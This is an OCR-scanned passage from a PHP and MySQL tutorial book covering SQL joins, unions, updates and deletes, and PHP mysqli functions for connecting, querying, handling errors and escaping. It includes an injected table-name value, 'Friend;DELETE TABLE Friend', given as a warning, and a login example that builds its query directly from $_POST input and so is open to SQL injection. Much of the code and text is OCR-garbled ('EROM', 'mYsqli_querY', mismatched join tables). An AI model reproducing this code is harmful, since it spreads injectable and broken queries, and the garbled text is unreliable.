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You can combine any of the expressions in Table 4-2 with ands and ORs. In 
some cases, you need to use parentheses to clarify the selection criteria. For 
instance, you can use the following query to answer your boss’s urgent need 
to find all customers whose names begin with B, who live in Indianapolis, 
and who have an 8 in either their phone or fax number: 

SELECT lastName,firstName FROM Customer 
WHERE lastName LIKE "B%" 

AND city = "Indianapolis" 

AND (phone LIKE "%8%" OR fax LIKE "%8%") 

Notice the parentheses in the last line. You wouldn’t get the results that 
you asked for without the parentheses. Without the parentheses, each con¬ 
nector would be processed in order from the first to the last, resulting in 
a list that includes all customers whose names begin with B and who live 
in Indianapolis and whose phone numbers have an 8 in them and all cus¬ 
tomers whose fax numbers have an 8 in them, whether or not they live in 
Indianapolis and whether or not their name begins with a B. When the last 
OR is processed, customers are selected whose characteristics match the 
expression before the OR or the expression after the OR. The expression 
before the OR is connected to previous expressions by the previous ands. 
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and so it doesn’t stand alone, but the expression after the OR does stand 
alone, resulting in the selection of all customers with an 8 in their fax number. 

Using the LIMIT kegWord 

LIMIT specifies how many rows can be returned. The form for limit is 
LIMIT startnumber,numberofrows 

The first row that you want to retrieve is startnumber, and the number 
of rows to retrieve is numberofrows. If startnumber is not specified, 1 is 
assumed. To select only the first three customers who live in Texas, use this 
query: 

SELECT * EROM Customer WHERE state="TX" LIMIT 3 

Using the OlSTlAJCT kegvVord 

Rows in the table can have identical values in one or more columns. However, 
in some cases, when you select a column, you don’t want to retrieve multiple 
rows with identical values. You want to retrieve the value only once. For exam¬ 
ple, suppose you have a table of products with one field called Category. 
The data undoubtedly contains many products in each category. Now sup¬ 
pose you want to display a list of all the categories available in the database. 
You want this list to contain each category listed only once. The keyword 
DISTINCT is provided for this purpose. 

To prevent a select query from returning all identical records, add the 
keyword distinct immediately after select, as follows: 

select distinct Category FROM Product 

Combining information from more than one table 

In previous sections of this chapter, we assume that all the information you 
want is in a single table. However, you might want to combine information 
from different tables. You can do this easily in a single query. 

Sometimes your question requires information from more than one table. 

For instance, the question, “How many orders did customer Joe Smith place 
during the months of April and December?” requires information from mul¬ 
tiple tables. You can ask this question easily in a single select query by 
combining multiple tables. 

Two words can be used in a select query to combine information from two 
or more tables: 
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♦ UNION: Rows are retrieved from one or more tables and stored together, 
one after the other, in a single result. For example, if your query selected 
6 rows from one table and 5 rows from another table, the result would 
contain 11 rows. 

♦ JOIN: The tables are combined side by side, and the information is 
retrieved from both tables. 

umoN 

UNION is used to combine the results from two or more select queries. The 
results from each query are added to the result set following the results of 
the previous query. The format of the UNION query is as follows: 

SELECT query UNION ALL SELECT query . .. 

You can combine as many select queries as you need. A select query can 
include any valid select format, including where clauses, limit clauses, 
and so on. The rules for the queries are 

♦ All the SELECT queries must select the same number of columns. 

♦ The columns selected in the queries must contain the same type of data. 

The result set contains all the rows from the first query, followed by all 
the rows from the second query, and so on. The column names used in the 
result set are the column names from the first select query. 

The series of select queries can select different columns from the same 
table, but situations in which you want a new table with one column in a 
table followed by another column from the same table are unusual. It’s much 
more likely that you want to combine columns from different tables. For 
example, you might have a table of members who have resigned from the 
club (oldMeinber) and a separate table of current members (Member). You 
can get a list of all members, both current and resigned, with the following 
query: 

SELECT lastName,firstName FROM Member UNION ALL 
SELECT lastName, firstName FROM OldMeinber 

The result of this query is the last and first names of all current members, 
followed by the last and first names of all the members who have resigned. 

Depending on how you organized your data, you might have duplicate 
names. For instance, perhaps a member resigned, and his name is in the 
OldMember table — but he joined again, so his name is added to the Member 
table. If you don’t want duplicates, don’t include the word all. If all is not 
included, duplicate lines aren’t added to the result. 
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You can use order by with each select query, as we discuss in the 
“Retrieving data in a specific order” section, earlier in this chapter, or you 
can use order by with a union query to sort all the rows in the result set. 

If you want order by to apply to the entire result set, rather than just to the 
query that it follows, use parentheses as follows: 

(SELECT lastName FROM Member UNION ALL 

SELECT lastName FROM OldMember) ORDER BY lastName 


Join 

Combining tables side by side is a join. Tables are combined by matching 
data in a column — the column that they have in common. The combined 
results table produced by a join contains all the columns from both tables. 
For instance, if tablel has two columns (memberiD and height), and 
table2 has two columns (memberiD and weight), a join results in a table 
with four columns: memberiD (from tablel), height, memberiD (from 
table2), and weight. 

The two common types of joins are an inner join and an outer join. The dif¬ 
ference between an inner and outer join is in the number of rows included in 
the results table. 

♦ Inner join: The results table produced by an inner join contains only 
rows that existed in both tables. 

♦ Outer join: The combined table produced by an outer join contains all 
rows that existed in one table with blanks in the columns for the rows 
that did not exist in the second table. 

For instance, if tablel contains a row for Joe and a row for Sally, and table2 
contains only a row for Sally, an inner join would contain only one row: the 
row for Sally. However, an outer join would contain two rows — a row for 
Joe and a row for Sally — even though the row for Joe would have a blank 
field for weight. 

The results table for the outer join contains all the rows for one table. If any 
of the rows for that table don’t exist in the second table, the columns for the 
second table are empty. Clearly, the contents of the results table are deter¬ 
mined by which table contributes all its rows, requiring the second table 
to match it. Two kinds of outer joins control which table sets the rows and 
which must match: a left join and a right join. 

You use different select queries for an inner join and the two types of 
outer joins. The following query is an inner join: 

SELECT columnnamelist FROM tablel, table2 

WHERE tablel.col2 = table2.col2 
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And these queries are outer joins: 

SELECT columnnamelist FROM tablel LEFT JOIN table2 
ON tablel.coll=table2.col2 

SELECT columnnamelist FROM tablel RIGHT JOIN table2 
ON tablel.coll=table2.col2 

In all three queries, tablel and table2 are the tables to be joined. You can 
join more than two tables. In both queries, coll and col2 are the names of 
the columns being matched to join the tables. The tables are matched based 
on the data in these columns. These two columns can have the same name 
or different names, but they must contain the same type of data. 

As an example of inner and outer joins, consider a Clothes catalog with two 
tables. One table is Product, with the two columns Name and Type holding 
the following data: 

Name Type 

T-shirt Shirt 

Dress shirt Shirt 

Jeans Pants 

The second table is Color, with two columns Name and Color holding the 
following data: 

Name Color 

T-shirt white 

T-shirt red 

Loafer black 

You need to ask a question that requires information from both tables. If you 
do an inner join with the following query: 

SELECT * FROM Product,Color WHERE Product.Name = Color.Name 

you get the following results table with four columns: Name (from Product), 
Type, Name (from Color), and Color. 

Name Type Name Color 

T-shirt Shirt T-shirt white 

T-shirt Shirt T-shirt red 

Notice that only T-shirt appears in the results table — because only 
T-shirt was in both of the original tables, before the join. On the other 
hand, suppose you do a left outer join with the following query: 
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SELECT * FROM Product LEFT JOIN Color 
ON Product. Name=Color. Name 


You get the following results table, with the same four columns — Name 
(from Product), Type, Name (from Color), and Color — but with different 
rows: 


Name 

Type 

Name 

Color 

T-shirt 

Shirt 

T-shirt 

white 

T-shirt 

Shirt 

T-shirt 

red 

Dress shirt 

Shirt 

<NULL> 

<NULL> 

Jeans 

Pants 

<NULL> 

<NULL> 


This table has four rows. It has the same first two rows as the inner join, but 
it has two additional rows — rows that are in the Product table on the left 
but not in the Color table. Notice that the columns from the table Color 
are blank for the last two rows. 


And, on the third hand, suppose that you do a right outer join with the 
following query: 

SELECT * FROM Product RIGHT JOIN Color 
ON Product.petName=Color. Name 


You get the following results table, with the same four columns, but with still 
different rows: 


petName 

T-shirt 

T-shirt 

<NULL> 


petType 

Shirt 

Shirt 

<NULL> 


petName 

T-shirt 

T-shirt 

Loafers 


petColor 

white 

red 

Black 


Notice that these results contain all the rows for the Color table on the 
right but not for the Product table. Notice the blanks in the columns for the 
Product table, which doesn’t have a row for Loafers. 

The joins that we discuss so far find matching entries in tables. Sometimes 
it’s useful to find out which rows in a table have no matching entries in 
another table. For example, suppose that you want to know who has never 
logged in to your Members Only section. Suppose you have one table with 
the member’s login name (Member) and another table with the login dates 
(Login). You can ask this question by selecting from the two tables. You 
can find out which login names don’t have an entry in the Login table with 
the following query: 

SELECT loginName FROM Member LEFT JOIN Login 
ON Member.loginName=Login.loginName 
WHERE Login.loginName IS NULL 
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This query gives you a list of all the login names in the Member table that 
aren’t in the Login table. 


Updating Information in a Database 

Changing information in an existing row is updating the information. For 
instance, you might need to change the address of a customer because she 
moved, or you might need to add a fax number that a customer left blank 
when he originally entered his information. 

The UPDATE statement is straightforward: 

UPDATE tablename SET column=value,column=value, ... 

WHERE clause 

In the SET clause, you list the columns to be updated and the new values to 
be inserted. List all the columns that you want to change in one statement. 
Without a WHERE clause, the values of the column(s) would be changed in all 
rows. But with the where clause, you can specify which rows to update. For 
instance, to update an address in the Customer table, use this statement: 

UPDATE Customer SET street="3423 RoseLawn", 
phone=''555-555-5555" 

WHERE lastName="Contrary" 

RemoUin^ Information from a Database 

Keep the information in your database up to date by deleting obsolete infor¬ 
mation. However, be very careful when removing information. After you 
drop the data, it’s gone forever. It cannot be restored. You only get it back if 
you enter it all again. 

You can remove a row or a column from a table, or you can remove the 
entire table or database and start over. 

You can remove a row from a table with the delete statement: 

DELETE FROM tablename WHERE clause 

Be extremely careful when using delete. If you use a delete statement 
without a where clause, it will delete all the data in the table. We mean all 
the data. We repeat, all the data. The data cannot be recovered. This function 
of the DELETE statement is right at the top of our don’t-try-this-at-home list. 
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You can delete a column from a table by using the alter statement: 
ALTER TABLE tablename DROP columnname 
You can remove the entire table or database with 

DROP TABLE tablename 

or 

DROP DATABASE databasename 


Chapter 5: Communicating u/ith 
the database from PHP Scripts 


In This Chapter 

Using PHP built-in functions to access MySQL 
Sending SQL queries to the MySQL server 
Understanding how to handle MySQL errors 
Using other helpful functions 
Changing functions from mysqli to mysql 


and MySQL work well together, and this dynamic partnership is 
* what makes PHP and MySQL so attractive for web database application 
development. Whether you have a database full of information that you 
want to make available to users (such as a product catalog) or a database 
waiting to be filled by users (for example, a customer database), PHP and 
MySQL work together to implement your application. 


This chapter describes accessing MySQL from PHP scripts. 


Knowing Hou/ MySQL and PHP Work Together 

You interact with the database by passing messages to the MySQL server. 

As explained in Chapter 1 of this minibook, the messages are composed in 
the SQL language, a standard computer language understood by most data¬ 
base management systems. 

PHP doesn’t understand SQL, but it doesn’t need to: PHP just establishes a 
connection with the MySQL server and sends the SQL message over the con¬ 
nection. The MySQL server interprets the SQL message, follows the instruc¬ 
tions, and sends a return message that states its status and what it did (or 
reports an error if it couldn’t understand or follow the instructions). 

The PHP language provides functions that make communicating with MySQL 
extremely simple. You use PHP functions to send SQL queries to the database. 
You don’t need to know the details of communicating with MySQL; PHP 
handles the details. You only need to know the SQL queries and how to use 
the PHP functions. 




516 PHP Functions That Communicate u>ith M^SQL 


We describe the general syntax for SQL queries in Chapter 1 of this mini¬ 
book. Individual specific queries are described in detail where we describe 
how to use MySQL for a specific purpose. For example, we describe how 
to create MySQL accounts in Chapter 2 in this minibook, so the SQL query 
for creating accounts is described at that location. Qn the other hand, we 
describe how to retrieve data from a MySQL database in Chapter 4 in this 
minibook, so the SQL query used for that purpose is described in detail in 
that chapter. 


PHP Functions That Communicate u/ith MySQL 

PHP provides two sets of functions for communicating with MySQL — the 
mysql functions and the mysqli (MySQL Improved) functions. Which func¬ 
tions you use depends on the version of MySQL and PHP you’re using. 

The mysqli functions were added in PHP 5 for use with MySQL versions 4.1 
and later. If you’re using a web hosting company, you need to know whether 
it offers PHP 5, which version of MySQL it provides, and whether it makes 
the mysqli functions available. In this book, we assume that you’re using 
PHP 5 or later, MySQL 5.0, and the mysqli functions. If your web host doesn’t 
offer the mysqli functions, you need to convert the mysqli functions in this 
book to mysql functions. The section “Converting mysqli Functions to mysql 
Functions,” later in this chapter, explains the differences. 

If you installed PHP and MySQL yourself on your own computer planning to 
develop your PHP scripts locally and upload the finished scripts to your web 
hosting company, you need to install the same versions and activate the same 
MySQL support functions that your web host provides. Otherwise, if you 
install different versions, even newer ones, the scripts may not behave in the 
same way on your web host’s computer as they do on your local computer. 

You can find a discussion of the issues about and instructions for installing 
your web development environment in Book 1. 


Communicating u/ith MySQL 

This chapter describes accessing MySQL from PHP scripts. (Accessing 
MySQL databases outside of PHP scripts is discussed in Chapters 1-4 
in this minibook.) SQL queries are sent to MySQL using PHP functions. 
Communicating with MySQL involves the following steps: 

1 . Connect to the MySQL server. 

2 . Send the SQL query. 
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In this section, we tell you how to do both steps, and we tell you how to 
send multiple queries. 

Connecting to the Mt^SQL server 

Before you can store or get any data, you need to connect to the database, 
which might be on the same computer as your PHP scripts or on a different 
computer. You don’t need to know the details of connecting to the database 
because PHP handles the details. All you need to know is the name and loca¬ 
tion of the database, along with a username and password to access it. Think 
of a database connection in the same way that you think of a telephone 
connection. You don’t need to know the details about how the connection 
is made — that is, how your words move from your telephone to another 
telephone — you need to know only the area code and phone number. The 
phone company handles the details. 

To connect to the MySQL server, you need to know the name of the com¬ 
puter on which the database is located and your MySQL account’s user ID 
and password. For most queries, you also need to know the name of the 
database with which you want to interact. 

To open the connection, use the mysqli_connect function: 

$cxn = mysqli_connect( "host","acct","password","dbname ") 
or die {"message"); 

Fill in the following information: 




♦ host: The name of the computer on which MySQL is installed — for 
example, databasehost. example. com. If the MySQL database is on 
the same computer as your website, you can use localhost as the 
computer name. If you leave this information blank (""), PHP assumes 

localhost. 

♦ acct: The name of any valid MySQL account. (We discuss MySQL 
accounts in detail in Chapter 2 of this minibook.) 

♦ password: The password for the MySQL account specified by acct. 

If the MySQL account doesn’t require a password, don’t type anything 
between the quotes: "". 

♦ dbname: The name of the database with which you want to communicate. 
This parameter is optional — you can select the database later, with a 
separate command, if you prefer. You can select a different database at 
any point in your script. 

If you’re using the mysql functions, you can’t select the database in 
the connect function. You must use a separate function — mysql_ 
select_db — to select the database. 
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♦ message: The message sent to the browser if the connection fails. The 
connection fails if the computer or network is down, or if the MySQL server 
isn’t running. It also may fail if the information provided isn’t correct — 
for example, if the password contains a typo. 

You might want to use a descriptive message during development, 
such as Couldn' t connect to server, but a more general message 
suitable for customers after you put the application in use, such as 

The Catalog is not available at the moment. Please try 
again later. 



The host includes a port number that’s needed for the connection. Almost 
always, the port number is 3306. On rare occasions, the MySQL administrator 
needs to set up MySQL so that it connects on a different port. In these cases, 
the port number is required for the connection. The port number is specified 
as hostname:partnumber. For instance, you might use localhost: 8808. 


With these statements, mysgli_connect attempts to open a connection 
to the named computer, using the account name and password provided. 
If the connection fails, the script stops running and sends message to the 
browser. 


The following statement connects to the MySQL server on the local computer, 
using a MySQL account named phpuser that doesn’t require a password: 

$cxn = mysqli_connect("localhost", "phpuser", "Customer") 
or die ("Couldn't connect to server."); 

For security reasons, you should store the connection information in vari¬ 
ables and use the variables in the connection statement, as follows: 

$host="localhost"; 

$user="phpuser"; 

$password=""; 

$dbname = "Customer"; 

$cxn = mysqli_connect($host,$user,$password,$dbname) 
or die("Couldn't connect to server."); 

For even more security, you can put the assignment statements for the con¬ 
nection information in a separate file in a hidden location so that the account 
name and password aren’t even in the script. You insert the account infor¬ 
mation from the file by using an include statement, as described in Book 
IV, Chapter 2. 

The variable $cxn contains information that identifies the connection. You 
can have more than one connection open at a time by using more than one 
variable name. 
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A connection remains open until you close it or until the script ends. You 
close a connection as follows: 

mYsqli_close($connectionname); 

For instance, to close the connection in the preceding example, use this 
statement: 

mYsqli_close ($cxn); 

Sending an SQL statement 

After you have an open connection to the MySQL server, you send your SQL 
statement query. You can find details of the SQL statements and queries that 
you need for specific purposes in the other chapters in this minibook. 

To interact with the database, put your SQL statement into a variable and 
send it to the MySQL server with the function mysqli_query, as in the fol¬ 
lowing example: 

$querY = "SELECT * FROM Customer"; 

$result = mYsqli_querY ($cxn, $querY) 

or die ("Couldn't execute querv."); 

The query is executed on the currently selected database for the specified 
connection. 

The variable $result holds information on the result of executing the query 
but not the actual results. The information in $result depends on whether 
or not the query gets information from the database: 

♦ For queries or statements that don’t get any data: The variable 
$result contains information about whether the query or statement 
executed successfully or not. If it’s successful, $result is set to true; 
if it’s not successful, $result is set to false. Some queries and state¬ 
ments that don’t return data are insert and update. 

♦ For queries that return data: The variable $result contains a result 
identifier that specifies where the returned data is located, not the 
returned data itself. Some queries that return data are select and 
SHOW. 

The use of single and double quotes can be a little confusing when assigning 
the query or statement to the $query variable. You’re actually using quotes 
on two levels: the quotes that assign the string to $querY and the quotes 
that are part of the SQL language itself. The following guidelines can help 
you avoid any problems with quotes when working with SQL: 
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♦ Use double quotes at the beginning and end of the string. 

♦ Use single quotes before and after variable names. 

-f Use single quotes before and after literal values. 

The following statements show examples of assigning SQL strings to vari¬ 
ables in PHP: 


$query = "SELECT firstName FROM Customer"; 

$query = "SELECT firstName FROM Customer WHERE lastName='Smith'"; 
$query = "UPDATE Customer SET lastName='$last_name'"; 



The SQL statement itself doesn’t include a semicolon (;), so don’t put a 
semicolon inside the final quote. The only semicolon appears at the very 
end, as shown in the previous examples; this is the PHP semicolon that ends 
the statement. 


Sending muttipte {(ueries 

Sometimes, you want to send two or more queries at the same time. MySQL 
allows you to do so, but you need to use a different function to send the que¬ 
ries. You can send multiple queries with the following function: 


mYsqli_multi_querY($cxn, $querY) 


You send the queries in a single string with the queries separated by a semi¬ 
colon: 



$querY = "SELECT * EROM Cust;SELECT * FROM OldCust"; 
mYsqli_multi_querY($cxn, $querY); 

The multiple_query function isn’t available with the mysql functions, only 
with the mysqli functions. 

Sending queries can be less secure than sending one query. Whenever you 
use data from an outside source, be sure you validate the outside data thor¬ 
oughly. For instance, suppose you display a form asking the user for a table 
name, and you create a query from the table name that the user enters, as 
follows: 


$querY = "SELECT * EROM Friend"; 

The user enters the table name Friend. The query is fine. However, sup¬ 
pose the user enters the following into the form: 


Friend;DELETE TABLE Friend 




Selecting a (database 


Your query then is 

$querY = "SELECT * FROM Friend;DELETE TABLE Friend"; 

If you send this query, the query is not so fine. You won’t like the results. 
You probably didn’t want the table deleted. Be sure to always sanitize data 
before sending it to MySQL! 
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If you don’t select the database in the connect function, you can select the 
database by using the mysqli_select_db function. You can also use this 
function to select a different database at any time in your script. The format is 

mYsqli_select_db($cxn," databasename") 
or die ("message"}; 



If you’re using the mysql functions, rather than the mysqli functions, you 
must select the database in a separate function, using mysql_select_db. 
The section “Converting mysqli Functions to mysql Functions,” later in this 
chapter, explains in more detail. 


Fill in the following information: 


♦ cxir The variable that contains the connection information. 

♦ databasename: The name of the database. 

♦ message: The message that’s sent to the browser if the database can’t 
be selected. The selection might fail because the database can’t be 
found, which is usually the result of a typo in the database name. 


For instance, you can select the database Customer with the following 
statement: 


mYsqli_select_db($cxn,"Customer") 

or die ("Couldn't select database."); 

If mYsqli_select_db can’t select the database, the script stops running 
and the message Couldn' t select database . is sent to the browser. 

The database stays selected until you select a different database. To select a 
different database, just use a new mYsqli_select_db function statement. 
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Handling MySQL Errors 

You use the mysqli functions of the PHP language, such as mysqli_connect 
and mysqli_querY, to interact with the MySQL database. Things will some¬ 
times go wrong when you use the statements. You may make an error in 
your typing, such as mistyping a database name. Sometimes, problems arise 
that you can’t avoid, such as the database or the network being down. You 
need to include code in your script that handles error situations. 

You can read about PHP error handling in Book IV, Chapter 1. That chapter 
describes the types of errors that PHP displays and how to turn them on and 
off. As discussed in Book IV, you usually want to make your error handling 
more descriptive to assist with troubleshooting problems during development, 
but you don’t want the extra information displayed to the public. 

For instance, suppose that you’re using an account called root to access 
your database and you make a typo, as in the following statements: 

$host = "localhost"; 

$user = "rot"; 

$password = ""; 

$cxn = mysqli_connect($host,$user,^password) 

Because you type " rot " rather than " root ", you see a warning message 
similar to this one: 

Warning: Access denied for user: ' rotSlocalhost ' (Using 
password: NO) ... 

The preceding error message contains the information that you need to 
figure out the problem — it shows your account name that includes the 
typo. However, after your script is running and customers are using it, you 
don’t want your users to see a technical error message that shows your user 
ID. You want to turn the PHP errors off or send them to an error log file. You 
could then use a die statement to stop the script and display a polite mes¬ 
sage to the user, as follows: 

$cxn = mysqli_connect($host,$user,^password) 

or die("The Catalog is not available at the moment. Please 
try again later."); 

When a mysqli_query () function fails, MySQL returns an error message 
that contains information about the cause of the failure. However, this mes¬ 
sage isn’t displayed unless you specifically display it. Again, you may want 
to see these messages when you’re developing the script, but you may not 
want to display them to the public. You can display the MySQL error that’s 
returned by using the following function: 


mysqli_error ($cxn) 
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For example, you might include the function in your code, as follows: 

$querY = "SELECT * FROM Cust"; 

$result = mYsqli_querY ($cxn, $querY) 

or die ("Error: ".mYsqli_error($cxn)); 

In this example, if the function call fails, the die statement displays the 
MySQL error, which might be something like this: 

Error: Table 'catalog.cust' doesn't exist 

Occasionally, you may want to perform additional actions if the function 
fails, such as delete variables or close the database connection. You can per¬ 
form such actions by using a conditional statement: 

if(!$result = mYsqli_querY($cxn,$querY)) 

{ 

echo mYsqli_error($cxn); 
unset($auth); 
exit(); 

} 



If the function call falls, the statements in the if block are executed. The 
echo statement displays the MySQL error returned by the function. A vari¬ 
able is removed, and the script exits. 

Notice the ! (exclamation point) in the if statement. ! means "not". In 
other words, the if statement is true if the assignment statement is not true. 


Using Other Helpful mgsgli Functions 

Qther useful mysqli functions are available for you to use in your PHP scripts. 
The following subsections describe how to use mysqli functions to count the 
number of rows returned by a query, determine the last automatically made 
entry, count rows affected by a query, and escape characters. 


Counting the number of rou/s returned bg a guerg 

Qften, you want to know how many rows your SQL query returned. Your 
query specifies criteria that the information must meet to be returned, such 
as state must equal TX or lastName must equal Smith. The function 
mysqli_num_rows tells you how many rows were found that meet the 
criteria. 

Login pages frequently use this function. When a user attempts to log in, 
he or she types a username and a password into an HTML form. Your PHP 
script then checks for the username and password in a database. If it is 
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found, the username and password are valid. You might use code similar to 
the following: 

$querY = "SELECT * EROM ValidUser 

WHERE acct = '$_POST[userlD] 

AND password = '$password; 

$result = mYsqli_querY($cxn,$querY); 

$n = mYsql_num_rows($result); 
if($n < 1) 

{ 

echo "User name and password are not valid"; 
exit(); 

} 

in this code, the SQL query looks for a row with the username (called acct 
in this example) and password provided by the user in the form. The code 
then tests the query result to see how many rows it contains. If the result 
doesn’t contain any rows, that is less than one row, a user with the provided 
username and password doesn’t exist in the database, and thus, the account 
information is not valid and the user is not allowed to log in. 

determining the fast auto entrt^ 

Many database tables contain an auto_increment field. This is a serial 
field in which MySQL adds the field value automatically. When a row is 
added, MySQL gives the auto_increment field the next serial value after 
the preceding row. Such fields are often defined as a unique identifier or pri¬ 
mary key for a table. 

Because MySQL adds the auto value, you do not necessarily know which 
value was stored in the field for the new row. In some situations, you need 
to know what the number was so that you can use it later in the script. The 
function mysqli_insert_id returns the number that was last added to an 
AUTO_INCREMENT field. 

One situation in which you need to know the number MySQL stored in the 
field is when you store an order and order items in separate tables. For 
example, if you define the orderiD field as an auto_increment field, 
MySQL adds the number to the orderiD field. However, you need to store 
this number in the Orderitem table so that you can connect the items to 
the order. You might use code similar to the following: 

$querY = "INSERT INTO CustomerOrder (customerlD,orderDate) 
VALUES ($customerlD,$date)"; 

$result = mYsqli_querY($cxn,$querY); 

$orderID = mYsqli_insert_id($cxn) ; 

$querY = "INSERT INTO Orderitem (orderiD,color,size,price) 
VALUES ($orderID,$color,$size,$price)"; 
$result = mYsqli_querY($cxn,$querY); 
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In the first query, orderiD is not specified, so MySQL stores the next serial 
number in that field. In the second query, the orderiD inserted in the previ¬ 
ous query is inserted into the second table. 

Counting affected roiVs 

Some SQL queries change the database, but don’t return any data. For instance, 
an UPDATE query can change the data in a table, but it doesn’t return any 
data. In this case, an update statement may affect one, many, or zero rows. 
For instance, the following is an update statement: 

$stmt = "UPDATE Customer SET lastName = "Smyth" 

WHERE lastName = "Smith"; 

This statement will change any last names in the table with the value Smith 
to Smyth. 

In some cases, you may need to know how many rows were changed by tbe 
statement. In this example, there may be no one in the database with the 
name Smith or there may be hundreds. You can find out how many rows 
were updated with themysqli_af fected_rows function. This function 
returns the number of rows that were affected by the last update, insert, 
REPLACE, or DELETE Statement. 

Suppose you want to set a field in a table that identifies students who passed 
a test. You might also want to know how many of the students passed. You 
might use code similar to the following: 

$query = "UPDATE Student SET status='pass' WHERE score > 50"; 
$result = mysqli_query($cxn,$query); 

$passed = mysqli_affected_rows($cxn); 
echo "$passed students passed"; 

In this code, any student in the table whose score is higher than 50 passed 
the test. The variable $passed contains the number of students whose 
score was high enough for their status field to be updated to "pass " . 

Escaping characters 

When you store any string information in your database, you need to escape 
special characters. This is an essential security measure. 

PHP versions before version 6 provide a feature called magic quotes that 
automatically escapes all strings in the $_post and $_get arrays. Single 
quotes, double quotes, backslashes, and null characters are escaped. This 
feature, designed to help beginning users, is controlled by the magic_ 
quotes-gpc setting in php. ini and is turned on by default in PHP 4 and 
PHP 5. In PHP 6, the magic quotes feature is no longer available. 
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The magic quotes feature results in a great deal of inefficient, unnecessary 
escaping. It also results sometimes in undesirable escaping. In general, we 
recommend you turn off magic quotes in your php. ini file. Making changes 
to the php.ini is discussed in more detail in Book IV, Chapter 1. 

Because it is essential that you escape your data before storing it, if the magic 
quotes feature is turned off, you must escape your data manually. The function 
mysqli_real_escape_string is provided for this purpose. Before storing 
any data in a database, apply the function to it. The following lines show some 
possible code that escapes data so it is safe to store in a database: 

$lastNaine = mYsqli_real_escape_string ($lastNaitie) ; 

$lastName = mYsqli_real_escape_string($_POST['lastName ']); 


Con(/ertin0 njysi{(i Functions to njysi{l Functions 

This book assumes you’re using PHP 5 or later with the mysqli functions 
to interact with MySQL 5.0 or 5.1. If you’re using PHP 4, the mysqli functions 
aren’t available. Instead, you use the mysql functions, even with later versions 
of MySQL. The mysql functions can communicate with the later versions of 
MySQL, but they can’t access some of the new features added in the later ver¬ 
sions of MySQL. The mysql functions are activated automatically in PHP 4. 

Throughout this book, the examples and scripts use MySQL 5.0 and the 
mysqli functions to communicate with MySQL. The PHP functions for use 
with MySQL 5.0 have the following general format: 


mysqli_function(value, value, . . . ) ; 


The i in the function name stands for improved (MySQL Improved). The 
second part of the function name is specific to the function, usually a word 
that describes what the function does. In addition, the function usually 
requires one or more values to be passed, specifying details such as the 
database connection or the data location. Here are two of the mysqli func¬ 
tions discussed earlier in this chapter: 

mysqli_connect(connection information ); 
mysqli_query($cxn ,"SQL statement "); 

The corresponding mysql functions are 

mysql_connect(connection information); 
mysql_querY( "SQL statement", $cxn); 

The functionality and syntax of the functions are similar, but not identical, 
for all functions. In particular, mysqli functions use a different process for 
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connecting to the MySQL server than mysql functions do. The format of the 
mysqli function is 

mYsqli_connect($host,$user,$password,$dbname); 

The connection process for mysql functions requires two function calls: 

mYsql_connect($host, $user ,$password); 
mYsql_select_db($dbname); 

If you need to use the mysql functions, rather than the mysqli functions, 
you need to edit the scripts in this book, replacing the mysqli functions with 
mysql functions. Table 5-1 shows mysqli function syntax and their equiva¬ 
lent mysql function syntax. 


Table 5-1 Syntax for mysql and mysqli Functions 

mifsifli Function 

mysifi Function 

mysqli_connect($host,$user, 
$passwd,$dbname) 

mYsql_ 

connect($host,$user, 
$passwd) followed by 
mysql select db($dbname) 

mysqli_errno($cxn) 

mysql_errno() ormYsql_ 
errno($cxn) 

mysqli_error($cxn) 

mysql_error() or mysql_ 
error($cxn) 

mYsqli_fetch_arraY($result) 

mysql_fetch_ 
array($result) 

mysqli_fetch_assoc($result) 

mysql_fetch_ 
assoc($result) 

mysqli fetch row($result) 

mysql fetch row($result) 

mYsqli insert id($cxn) 

mysql_insert_id($cxn) 

mysqli num rows($result) 

mysql num rows($result) 

mysqli_query($cxn,$sql) 

mysql_query($sql) or 
mysql query($sql,$cxn) 

mysqli_select_db($cxn, 
$dbname) 

mysql_select_db($dbname) 

mysqli_real_escape_ 
string($cxn,$data) 

mysql_real_escape_ 
string($data) 
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f http://tt/fd/b6c4/register.php 


icx 


l-c^.ll a 11^ 

☆ © 


Registration Information 
First Name:' 

Last Name:' 

E-mail Address:' 

Password:' 

Verify Password:' 

Address: 

City: 

State: | El _ 

ZIP: _ 

Phone Number: 

Number Type: © Work © Home 


Submit Query 


web 

extras 


For more info on web applications, go to www. dummies . com/extras/phpmysql 
j avascripthtmlSaio. 
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Chapter 1: ImproiJing \lour PHP 
Programs 


In This Chapter 

Including helpers automatically 
Reusing code 


f 

m n earlier chapters, you ve seen how to program in PHP. You ve seen how 
to create a program, how to loop, set up conditionals, and more. All of 
that knowledge has enabled you to create PHP programs that work well on 
the web. But you can make them even better, even easier to use, and that’s 
what this chapter is all about. 


In this chapter you’ll see how to improve and extend your PHP programs 
and how to create and use helper functions automatically. You’ll also see 
ways to reuse code rather than reinventing it every time you need it. 


AutomaticaKy Inctudin^ Helper Functions 

Once your programs reach a certain length and complexity, you find that 
there are a lot of includes and require_once () functions. Each time you 
make a new file or try to make something into a common function, you also 
need to go back through all the programs and add a new require_once. 
That can quickly become monotonous. Luckily, there’s a way around it. 

Usin0 auto_prepend_fite 

You can automatically prepend a PHP file so that its code is executed before 
the actual file being requested. In other words, if you send a visitor to a URL 
similar to http : / /www. example, com/login.php, you can use auto_ 
prepend_f ile to always require a helper file prior to the login. php code 
being run. That helper file could start the session, provide several functions 
that are used within your programs, or even load other files. 
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The auto_prepend_f ile function is part of your php. ini file, but it’s 
more common to set it in the Apache configuration using the php_value 
directive, like so: 

<DirectorY "/my/documentroot/path"> 

php_value auto_prepend_file "/my/documentroot/path/ 
prependfile.php" 

</Directory> 

The file included with auto_prepend_f ile is included as if the require () 
function was used. The practical implication of that means that, if the file 
being prepended is not found, an error will occur and the program won’t 
continue. 


Starting sessions With a prepended fite 

You learn about sessions in Book IV, Chapter 6. That chapter explains that 
in order to use sessions, you need to call the session_start () function 
on every page that will use sessions. This can be cumbersome, especially if 
you’re trying to tack sessions onto several PHP programs. You can use an 
auto_prepend_f ile to call session_start and, in doing so, you don’t 
have to change any other files! 



In the following exercise, you create two files: one that will be the main file 
and another containing a prepended function to start a session. Prior to per¬ 
forming this exercise, you should ensure that . htaccess files work or that 
you can alter your Apache web server configuration. 

Be sure to restart Apache if you make a change to the configuration. 

Within the .htaccess file for your document root, place the following code: 


php_value auto_prepend_file "prepend.php 



Alternatively, you can add that line within the <Directory> stanza in 
the Apache configuration for your web server for your document root. 

For example, if your document root is " /var/www" you can add that line 
after the <Directory " /var/www" > directive and before the closing </ 
Directory> line in the Apache conflg. 

